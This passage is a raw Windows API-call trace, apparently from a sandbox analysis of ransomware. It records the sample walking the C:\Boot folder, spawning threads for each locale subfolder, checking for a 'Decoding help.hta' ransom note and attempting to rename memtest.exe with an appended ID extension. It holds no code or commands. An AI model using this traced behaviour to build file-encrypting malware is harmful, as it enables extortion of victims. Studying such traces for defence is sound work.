ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0038.588] lstrcmpW (lpString1=".", lpString2="es-ES") returned -1 [0038.588] lstrcmpW (lpString1="..", lpString2="es-ES") returned -1 [0038.588] lstrcmpiW (lpString1="windows", lpString2="es-ES") returned 1 [0038.589] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.589] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.589] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="es-ES" | out: lpString1="\\\\?\\C:\\Boot\\es-ES") returned="\\\\?\\C:\\Boot\\es-ES" [0038.589] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\*.*") returned="\\\\?\\C:\\Boot\\es-ES\\*.*" [0038.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41a83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.599] CloseHandle (hObject=0x1c4) returned 1 [0038.599] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0038.599] lstrcmpW (lpString1=".", lpString2="fi-FI") returned -1 [0038.599] lstrcmpW (lpString1="..", lpString2="fi-FI") returned -1 [0038.599] lstrcmpiW (lpString1="windows", lpString2="fi-FI") returned 1 [0038.600] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.600] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.600] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="fi-FI" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI") returned="\\\\?\\C:\\Boot\\fi-FI" [0038.600] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fi-FI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\*.*") returned="\\\\?\\C:\\Boot\\fi-FI\\*.*" [0038.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4208590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.610] CloseHandle (hObject=0x1c4) returned 1 [0038.610] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0038.610] lstrcmpW (lpString1=".", lpString2="Fonts") returned -1 [0038.610] lstrcmpW (lpString1="..", lpString2="Fonts") returned -1 [0038.610] lstrcmpiW (lpString1="windows", lpString2="Fonts") returned 1 [0038.612] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.612] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.612] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="Fonts" | out: lpString1="\\\\?\\C:\\Boot\\Fonts") returned="\\\\?\\C:\\Boot\\Fonts" [0038.612] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0038.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4268730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.623] CloseHandle (hObject=0x1c4) returned 1 [0038.623] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0038.623] lstrcmpW (lpString1=".", lpString2="fr-FR") returned -1 [0038.623] lstrcmpW (lpString1="..", lpString2="fr-FR") returned -1 [0038.623] lstrcmpiW (lpString1="windows", lpString2="fr-FR") returned 1 [0038.624] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.624] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.624] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="fr-FR" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR") returned="\\\\?\\C:\\Boot\\fr-FR" [0038.624] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\*.*") returned="\\\\?\\C:\\Boot\\fr-FR\\*.*" [0038.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c00118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.634] CloseHandle (hObject=0x1c4) returned 1 [0038.634] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0038.634] lstrcmpW (lpString1=".", lpString2="hu-HU") returned -1 [0038.634] lstrcmpW (lpString1="..", lpString2="hu-HU") returned -1 [0038.634] lstrcmpiW (lpString1="windows", lpString2="hu-HU") returned 1 [0038.636] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.636] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.636] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="hu-HU" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU") returned="\\\\?\\C:\\Boot\\hu-HU" [0038.636] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hu-HU", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\*.*") returned="\\\\?\\C:\\Boot\\hu-HU\\*.*" [0038.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c78320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.699] CloseHandle (hObject=0x1c4) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0038.699] lstrcmpW (lpString1=".", lpString2="it-IT") returned -1 [0038.699] lstrcmpW (lpString1="..", lpString2="it-IT") returned -1 [0038.699] lstrcmpiW (lpString1="windows", lpString2="it-IT") returned 1 [0038.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.699] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.699] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="it-IT" | out: lpString1="\\\\?\\C:\\Boot\\it-IT") returned="\\\\?\\C:\\Boot\\it-IT" [0038.699] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\*.*") returned="\\\\?\\C:\\Boot\\it-IT\\*.*" [0038.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33b01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.700] CloseHandle (hObject=0x1c4) returned 1 [0038.700] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0038.700] lstrcmpW (lpString1=".", lpString2="ja-JP") returned -1 [0038.700] lstrcmpW (lpString1="..", lpString2="ja-JP") returned -1 [0038.700] lstrcmpiW (lpString1="windows", lpString2="ja-JP") returned 1 [0038.701] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.701] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.701] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="ja-JP" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP") returned="\\\\?\\C:\\Boot\\ja-JP" [0038.701] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ja-JP", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\*.*") returned="\\\\?\\C:\\Boot\\ja-JP\\*.*" [0038.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5de0938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.702] CloseHandle (hObject=0x1c4) returned 1 [0038.702] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0038.702] lstrcmpW (lpString1=".", lpString2="ko-KR") returned -1 [0038.702] lstrcmpW (lpString1="..", lpString2="ko-KR") returned -1 [0038.702] lstrcmpiW (lpString1="windows", lpString2="ko-KR") returned 1 [0038.704] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.704] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.704] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="ko-KR" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR") returned="\\\\?\\C:\\Boot\\ko-KR" [0038.704] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\*.*") returned="\\\\?\\C:\\Boot\\ko-KR\\*.*" [0038.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5df89a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.705] CloseHandle (hObject=0x1c4) returned 1 [0038.705] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0038.705] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.705] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.705] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Decoding help.hta" [0038.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta" (normalized: "c:\\boot\\decoding help.hta")) returned 0x1 [0038.705] lstrcmpiW (lpString1="Decoding help.hta", lpString2="memtest.exe") returned -1 [0038.705] lstrlenW (lpString="memtest.exe") returned 11 [0038.705] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.705] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.705] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="memtest.exe" | out: lpString1="\\\\?\\C:\\Boot\\memtest.exe") returned="\\\\?\\C:\\Boot\\memtest.exe" [0038.705] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\memtest.exe" | out: lpString1="\\\\?\\C:\\Boot\\memtest.exe") returned="\\\\?\\C:\\Boot\\memtest.exe" [0038.705] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\memtest.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\memtest.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\memtest.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0038.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), lpNewFileName="\\\\?\\C:\\Boot\\memtest.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\memtest.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0038.706] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0038.706] lstrcmpW (lpString1=".", lpString2="nb-NO") returned -1 [0038.706] lstrcmpW (lpString1="..", lpString2="nb-NO") returned -1 [0038.706] lstrcmpiW (lpString1="windows", lpString2="nb-NO") returned 1 [0038.707] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.707] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.707] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="nb-NO" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO") returned="\\\\?\\C:\\Boot\\nb-NO" [0038.707] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nb-NO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\*.*") returned="\\\\?\\C:\\Boot\\nb-NO\\*.*" [0038.707] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e10a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.708] CloseHandle (hObject=0x1c4) returned 1 [0038.708] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0038.708] lstrcmpW (lpString1=".", lpString2="nl-NL") returned -1 [0038.708] lstrcmpW (lpString1="..", lpString2="nl-NL") returned -1 [0038.708] lstrcmpiW (lpString1="windows", lpString2="nl-NL") returned 1 [0038.709] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.709] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.709] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="nl-NL" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL") returned="\\\\?\\C:\\Boot\\nl-NL" [0038.709] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nl-NL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\*.*") returned="\\\\?\\C:\\Boot\\nl-NL\\*.*" [0038.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e28a70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.711] CloseHandle (hObject=0x1c4) returned 1 [0038.711] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0038.711] lstrcmpW (lpString1=".", lpString2="pl-PL") returned -1 [0038.711] lstrcmpW (lpString1="..", lpString2="pl-PL") returned -1 [0038.711] lstrcmpiW (lpString1="windows", lpString2="pl-PL") returned 1 [0038.712] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.712] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.712] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="pl-PL" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL") returned="\\\\?\\C:\\Boot\\pl-PL" [0038.712] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pl-PL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\*.*") returned="\\\\?\\C:\\Boot\\pl-PL\\*.*" [0038.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e40ad8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.713] CloseHandle (hObject=0x1c4) returned 1 [0038.713] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0038.713] lstrcmpW (lpString1=".", lpString2="pt-BR") returned -1 [0038.713] lstrcmpW (lpString1="..", lpString2="pt-BR") returned -1 [0038.713] lstrcmpiW (lpString1="windows", lpString2="pt-BR") returned 1 [0038.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.714] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.714] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="pt-BR" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR") returned="\\\\?\\C:\\Boot\\pt-BR" [0038.715] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-BR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\*.*") returned="\\\\?\\C:\\Boot\\pt-BR\\*.*" [0038.715] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e58b40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.715] CloseHandle (hObject=0x1c4) returned 1 [0038.715] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0038.715] lstrcmpW (lpString1=".", lpString2="pt-PT") returned -1 [0038.715] lstrcmpW (lpString1="..", lpString2="pt-PT") returned -1 [0038.715] lstrcmpiW (lpString1="windows", lpString2="pt-PT") returned 1 [0038.717] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.717] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.717] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="pt-PT" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT") returned="\\\\?\\C:\\Boot\\pt-PT" [0038.717] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-PT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\*.*") returned="\\\\?\\C:\\Boot\\pt-PT\\*.*" [0038.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e70ba8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.718] CloseHandle (hObject=0x1c4) returned 1 [0038.718] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0038.718] lstrcmpW (lpString1=".", lpString2="ru-RU") returned -1 [0038.718] lstrcmpW (lpString1="..", lpString2="ru-RU") returned -1 [0038.718] lstrcmpiW (lpString1="windows", lpString2="ru-RU") returned 1 [0038.719] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.719] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.719] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="ru-RU" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU") returned="\\\\?\\C:\\Boot\\ru-RU" [0038.719] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ru-RU", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\*.*") returned="\\\\?\\C:\\Boot\\ru-RU\\*.*" [0038.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e88c10, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.720] CloseHandle (hObject=0x1c4) returned 1 [0038.720] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0038.720] lstrcmpW (lpString1=".", lpString2="sv-SE") returned -1 [0038.720] lstrcmpW (lpString1="..", lpString2="sv-SE") returned -1 [0038.720] lstrcmpiW (lpString1="windows", lpString2="sv-SE") returned 1 [0038.721] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.721] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.722] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="sv-SE" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE") returned="\\\\?\\C:\\Boot\\sv-SE" [0038.722] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sv-SE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\*.*") returned="\\\\?\\C:\\Boot\\sv-SE\\*.*" [0038.722] CreateThread (in: lpThreadAttributes=0x0, 